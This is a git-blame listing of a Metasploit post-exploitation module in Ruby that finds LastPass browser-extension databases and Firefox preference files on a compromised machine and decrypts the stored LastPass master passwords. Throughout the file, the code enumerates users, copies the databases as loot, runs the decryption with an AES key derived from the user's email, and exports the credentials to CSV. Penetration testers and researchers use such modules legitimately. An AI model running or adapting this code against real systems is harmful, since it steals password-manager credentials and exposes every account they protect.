2014-09-19 06:40:05 +00:00
|
|
|
require 'msf/core'
|
|
|
|
require 'base64'
|
|
|
|
require 'sqlite3'
|
2014-10-06 09:23:54 +00:00
|
|
|
require 'uri'
|
2014-09-19 06:40:05 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2014-09-28 08:59:02 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
include Msf::Post::OSX::System
|
|
|
|
include Msf::Post::Unix
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2014-10-17 19:50:18 +00:00
|
|
|
super(
|
|
|
|
update_info(
|
|
|
|
info,
|
|
|
|
'Name' => 'LastPass Master Password Extractor',
|
|
|
|
'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords',
|
|
|
|
'License' => MSF_LICENSE,
|
2014-10-18 00:40:19 +00:00
|
|
|
'Author' => [
|
|
|
|
'Alberto Garcia Illera <agarciaillera[at]gmail.com>', # original module and research
|
|
|
|
'Martin Vigo <martinvigo[at]gmail.com>', # original module and research
|
|
|
|
'Jon Hart <jon_hart[at]rapid7.com' # module rework and cleanup
|
|
|
|
],
|
2014-10-17 19:50:18 +00:00
|
|
|
'Platform' => %w(linux osx unix win),
|
2014-10-18 00:40:19 +00:00
|
|
|
'References' => [['URL', 'http://www.martinvigo.com/a-look-into-lastpass/']],
|
2014-10-17 19:50:18 +00:00
|
|
|
'SessionTypes' => %w(meterpreter shell)
|
|
|
|
)
|
|
|
|
)
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
if session.platform =~ /win/ && session.type == "shell" # No Windows shell support
|
|
|
|
print_error "Shell sessions on Windows are not supported"
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-10-19 20:05:11 +00:00
|
|
|
print_status "Searching for LastPass databases"
|
2014-09-28 08:59:02 +00:00
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
account_map = build_account_map
|
|
|
|
if account_map.empty?
|
2014-09-28 08:59:02 +00:00
|
|
|
print_status "No databases found"
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
print_status "Extracting credentials from #{account_map.size} LastPass databases"
|
2014-09-28 08:59:02 +00:00
|
|
|
|
2014-10-17 18:19:36 +00:00
|
|
|
# an array of [user, encrypted password, browser]
|
2014-10-13 05:23:55 +00:00
|
|
|
credentials = [] # All credentials to be decrypted
|
2014-10-19 19:59:51 +00:00
|
|
|
account_map.each_pair do |account, browser_map|
|
|
|
|
browser_map.each_pair do |browser, paths|
|
|
|
|
if browser == 'Firefox'
|
|
|
|
paths.each do |path|
|
|
|
|
data = read_file(path)
|
|
|
|
loot_path = store_loot(
|
|
|
|
'firefox.preferences',
|
|
|
|
'text/javascript',
|
|
|
|
session,
|
|
|
|
data,
|
|
|
|
nil,
|
|
|
|
"Firefox preferences file #{path}"
|
|
|
|
)
|
|
|
|
|
|
|
|
# Extract usernames and passwords from preference file
|
|
|
|
firefox_credentials(loot_path).each do |creds|
|
|
|
|
credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])]
|
|
|
|
end
|
|
|
|
end
|
|
|
|
else # Chrome, Safari and Opera
|
|
|
|
paths.each do |path|
|
|
|
|
data = read_file(path)
|
|
|
|
loot_path = store_loot(
|
|
|
|
"#{browser.downcase}.lastpass.database",
|
|
|
|
'application/x-sqlite3',
|
|
|
|
session,
|
|
|
|
data,
|
|
|
|
nil,
|
|
|
|
"#{account}'s #{browser} LastPass database #{path}"
|
|
|
|
)
|
|
|
|
|
|
|
|
# Parsing/Querying the DB
|
|
|
|
db = SQLite3::Database.new(loot_path)
|
|
|
|
lastpass_user, lastpass_pass = db.execute(
|
|
|
|
"SELECT username, password FROM LastPassSavedLogins2 " \
|
|
|
|
"WHERE username IS NOT NULL AND username != '' " \
|
|
|
|
"AND password IS NOT NULL AND password != '';"
|
|
|
|
).flatten
|
|
|
|
if lastpass_user && lastpass_pass
|
|
|
|
credentials << [account, browser, lastpass_user, lastpass_pass]
|
|
|
|
end
|
2014-10-17 18:19:36 +00:00
|
|
|
end
|
|
|
|
end
|
2014-10-06 09:23:54 +00:00
|
|
|
end
|
2014-10-17 18:19:36 +00:00
|
|
|
end
|
2014-09-28 08:59:02 +00:00
|
|
|
|
2014-10-18 00:40:19 +00:00
|
|
|
credentials_table = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => "LastPass credentials",
|
|
|
|
'Indent' => 1,
|
2014-10-19 19:59:51 +00:00
|
|
|
'Columns' => %w(Account Browser LastPass_Username LastPass_Password)
|
2014-10-18 00:40:19 +00:00
|
|
|
)
|
2014-10-17 18:19:36 +00:00
|
|
|
# Parse and decrypt credentials
|
|
|
|
credentials.each do |row| # Decrypt passwords
|
2014-10-19 19:59:51 +00:00
|
|
|
account, browser, user, enc_pass = row
|
2014-10-19 20:05:11 +00:00
|
|
|
vprint_status "Decrypting password for #{account}'s #{user} from #{browser}"
|
2014-10-17 18:19:36 +00:00
|
|
|
password = clear_text_password(user, enc_pass)
|
2014-10-19 19:59:51 +00:00
|
|
|
credentials_table << [account, browser, user, password]
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
2014-10-19 20:11:10 +00:00
|
|
|
unless credentials.empty?
|
|
|
|
print_good credentials_table.to_s
|
|
|
|
path = store_loot(
|
|
|
|
"lastpass.creds",
|
|
|
|
"text/csv",
|
|
|
|
session,
|
|
|
|
credentials_table.to_csv,
|
|
|
|
nil,
|
|
|
|
"Decrypted LastPass Master Passwords"
|
|
|
|
)
|
|
|
|
end
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
# Returns a mapping of { Account => { Browser => paths } }
|
|
|
|
def build_account_map
|
2014-09-28 08:59:02 +00:00
|
|
|
platform = session.platform
|
2014-10-18 00:40:19 +00:00
|
|
|
profiles = user_profiles
|
2014-10-19 19:59:51 +00:00
|
|
|
found_dbs_map = {}
|
2014-09-28 08:59:02 +00:00
|
|
|
|
2014-10-18 00:40:19 +00:00
|
|
|
if datastore['VERBOSE']
|
|
|
|
vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}"
|
|
|
|
else
|
|
|
|
print_status "Found #{profiles.size} users"
|
|
|
|
end
|
|
|
|
|
|
|
|
profiles.each do |user_profile|
|
2014-10-19 19:59:51 +00:00
|
|
|
account = user_profile['UserName']
|
|
|
|
browser_path_map = {}
|
|
|
|
|
2014-10-18 00:40:19 +00:00
|
|
|
case platform
|
|
|
|
when /win/
|
2014-10-17 18:19:36 +00:00
|
|
|
browser_path_map = {
|
|
|
|
'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
|
|
|
|
'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles",
|
|
|
|
'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
|
|
|
|
'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
|
|
|
|
}
|
2014-10-18 00:40:19 +00:00
|
|
|
when /unix|linux/
|
2014-10-17 18:19:36 +00:00
|
|
|
browser_path_map = {
|
|
|
|
'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
|
2014-10-17 19:50:18 +00:00
|
|
|
'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox"
|
2014-10-17 18:19:36 +00:00
|
|
|
}
|
2014-10-18 00:40:19 +00:00
|
|
|
when /osx/
|
2014-10-17 18:19:36 +00:00
|
|
|
browser_path_map = {
|
|
|
|
'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
|
|
|
|
'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles",
|
|
|
|
'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
|
|
|
|
'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
|
|
|
|
}
|
2014-10-18 00:40:19 +00:00
|
|
|
else
|
2014-10-19 19:30:50 +00:00
|
|
|
print_error "Platform not recognized: #{platform}"
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
found_dbs_map[account] = {}
|
2014-10-18 00:40:19 +00:00
|
|
|
browser_path_map.each_pair do |browser, path|
|
2014-10-19 20:05:11 +00:00
|
|
|
db_paths = find_db_paths(path, browser, account)
|
|
|
|
found_dbs_map[account][browser] = db_paths unless db_paths.empty?
|
2014-10-18 00:40:19 +00:00
|
|
|
end
|
2014-10-17 18:19:36 +00:00
|
|
|
end
|
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
found_dbs_map
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
2014-10-16 05:15:54 +00:00
|
|
|
# Returns a list of DB paths found in the victims' machine
|
2014-10-19 19:59:51 +00:00
|
|
|
def find_db_paths(path, browser, account)
|
2014-10-18 00:40:19 +00:00
|
|
|
paths = []
|
2014-10-16 04:29:47 +00:00
|
|
|
|
2014-10-19 20:05:11 +00:00
|
|
|
vprint_status "Checking #{account}'s #{browser}"
|
2014-10-16 05:15:54 +00:00
|
|
|
if browser == "Firefox" # Special case for Firefox
|
2014-10-17 19:50:18 +00:00
|
|
|
profiles = firefox_profile_files(path, browser)
|
2014-10-18 00:40:19 +00:00
|
|
|
paths |= profiles
|
2014-10-16 05:15:54 +00:00
|
|
|
else
|
2014-10-19 19:59:51 +00:00
|
|
|
paths |= file_paths(path, browser, account)
|
2014-10-16 05:15:54 +00:00
|
|
|
end
|
|
|
|
|
2014-10-19 19:59:51 +00:00
|
|
|
vprint_good "Found #{paths.size} #{browser} databases for #{account}"
|
2014-10-18 00:40:19 +00:00
|
|
|
paths
|
2014-10-16 04:29:47 +00:00
|
|
|
end
|
|
|
|
|
2014-09-28 08:59:02 +00:00
|
|
|
# Returns the relevant information from user profiles
|
2014-10-17 19:50:18 +00:00
|
|
|
def user_profiles
|
2014-10-17 17:20:55 +00:00
|
|
|
user_profiles = []
|
2014-09-28 08:59:02 +00:00
|
|
|
case session.platform
|
|
|
|
when /unix|linux/
|
2014-10-13 05:23:55 +00:00
|
|
|
if session.type == "meterpreter"
|
|
|
|
user_names = client.fs.dir.entries("/home")
|
|
|
|
else
|
|
|
|
user_names = session.shell_command("ls /home").split
|
|
|
|
end
|
2014-10-17 17:20:55 +00:00
|
|
|
user_names.reject! { |u| %w(. ..).include?(u) }
|
2014-09-28 08:59:02 +00:00
|
|
|
user_names.each do |user_name|
|
2014-10-17 17:20:55 +00:00
|
|
|
user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
when /osx/
|
|
|
|
user_names = session.shell_command("ls /Users").split
|
2014-10-17 17:20:55 +00:00
|
|
|
user_names.reject! { |u| u == 'Shared' }
|
2014-09-28 08:59:02 +00:00
|
|
|
user_names.each do |user_name|
|
2014-10-17 17:20:55 +00:00
|
|
|
user_profiles.push(
|
|
|
|
'UserName' => user_name,
|
|
|
|
"AppData" => "/Users/#{user_name}/Library",
|
|
|
|
"LocalAppData" => "/Users/#{user_name}/Library/Application Support"
|
|
|
|
)
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
when /win/
|
2014-10-17 17:20:55 +00:00
|
|
|
user_profiles |= grab_user_profiles
|
2014-09-28 08:59:02 +00:00
|
|
|
else
|
|
|
|
print_error "OS not recognized: #{os}"
|
|
|
|
end
|
2014-10-17 17:20:55 +00:00
|
|
|
user_profiles
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Extracts the databases paths from the given folder ignoring . and ..
|
2014-10-19 19:59:51 +00:00
|
|
|
def file_paths(path, browser, account)
|
2014-09-28 08:59:02 +00:00
|
|
|
found_dbs_paths = []
|
|
|
|
|
2014-10-22 23:34:17 +00:00
|
|
|
files = []
|
2014-09-28 08:59:02 +00:00
|
|
|
if directory?(path)
|
2014-10-22 23:34:17 +00:00
|
|
|
sep = session.platform =~ /win/ ? '\\' : '/'
|
2014-09-28 08:59:02 +00:00
|
|
|
if session.type == "meterpreter"
|
|
|
|
files = client.fs.dir.entries(path)
|
|
|
|
elsif session.type == "shell"
|
|
|
|
files = session.shell_command("ls \"#{path}\"").split
|
|
|
|
else
|
|
|
|
print_error "Session type not recognized: #{session.type}"
|
2014-10-17 17:20:55 +00:00
|
|
|
return found_dbs_paths
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-10-22 23:34:17 +00:00
|
|
|
files.each do |file_path|
|
|
|
|
unless %w(. .. Shared).include?(file_path)
|
|
|
|
found_dbs_paths.push([path, file_path].join(sep))
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-10-17 17:20:55 +00:00
|
|
|
found_dbs_paths
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
2014-10-17 17:20:55 +00:00
|
|
|
# Returns the profile files for Firefox
|
2014-10-17 19:50:18 +00:00
|
|
|
def firefox_profile_files(path, browser)
|
2014-10-06 09:23:54 +00:00
|
|
|
found_dbs_paths = []
|
|
|
|
|
|
|
|
if directory?(path)
|
2014-10-22 23:34:17 +00:00
|
|
|
sep = session.platform =~ /win/ ? '\\' : '/'
|
2014-10-06 09:23:54 +00:00
|
|
|
if session.type == "meterpreter"
|
|
|
|
files = client.fs.dir.entries(path)
|
|
|
|
elsif session.type == "shell"
|
|
|
|
files = session.shell_command("ls \"#{path}\"").split
|
|
|
|
else
|
|
|
|
print_error "Session type not recognized: #{session.type}"
|
2014-10-17 17:20:55 +00:00
|
|
|
return found_dbs_paths
|
2014-10-06 09:23:54 +00:00
|
|
|
end
|
|
|
|
|
2014-10-18 00:40:19 +00:00
|
|
|
files.reject! { |file| %w(. ..).include?(file) }
|
|
|
|
files.each do |file_path|
|
2014-10-22 23:34:17 +00:00
|
|
|
found_dbs_paths.push([path, file_path, 'prefs.js'].join(sep)) if file_path.match(/.*\.default/)
|
2014-10-18 00:40:19 +00:00
|
|
|
end
|
2014-10-17 17:20:55 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
found_dbs_paths
|
2014-10-06 09:23:54 +00:00
|
|
|
end
|
|
|
|
|
2014-10-13 05:23:55 +00:00
|
|
|
# Parses the Firefox preferences file and returns encoded credentials
|
|
|
|
def firefox_credentials(loot_path)
|
|
|
|
credentials = []
|
|
|
|
File.readlines(loot_path).each do |line|
|
2014-10-18 00:40:19 +00:00
|
|
|
if /user_pref\("extensions.lastpass.loginpws", "(?<encoded_creds>.*)"\);/ =~ line
|
|
|
|
creds_per_user = encoded_creds.split("|")
|
|
|
|
creds_per_user.each do |user_creds|
|
|
|
|
parts = user_creds.split('=')
|
|
|
|
# Any valid credentials present?
|
|
|
|
credentials << parts if parts.size > 1
|
|
|
|
end
|
|
|
|
else
|
|
|
|
next
|
|
|
|
end
|
2014-10-13 05:23:55 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
credentials
|
|
|
|
end
|
2014-10-06 09:23:54 +00:00
|
|
|
|
2014-09-28 08:59:02 +00:00
|
|
|
# Decrypts the password
|
|
|
|
def clear_text_password(email, encrypted_data)
|
|
|
|
return if encrypted_data.blank?
|
|
|
|
|
|
|
|
sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email)
|
|
|
|
sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin
|
|
|
|
|
|
|
|
if encrypted_data.include?("|") # Apply CBC
|
|
|
|
decipher = OpenSSL::Cipher.new("AES-256-CBC")
|
|
|
|
decipher.decrypt
|
|
|
|
decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary
|
|
|
|
decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and |
|
|
|
|
encrypted_password = encrypted_data[26..-1]
|
|
|
|
else # Apply ECB
|
|
|
|
decipher = OpenSSL::Cipher.new("AES-256-ECB")
|
|
|
|
decipher.decrypt
|
|
|
|
decipher.key = sha256_binary_email
|
2014-10-18 00:40:19 +00:00
|
|
|
encrypted_password = encrypted_data
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
|
|
|
|
2014-10-18 00:40:19 +00:00
|
|
|
begin
|
|
|
|
decipher.update(Base64.decode64(encrypted_password)) + decipher.final
|
|
|
|
rescue
|
|
|
|
print_error "Password for #{email} could not be decrypted"
|
|
|
|
end
|
2014-09-28 08:59:02 +00:00
|
|
|
end
|
2014-09-19 06:40:05 +00:00
|
|
|
end
|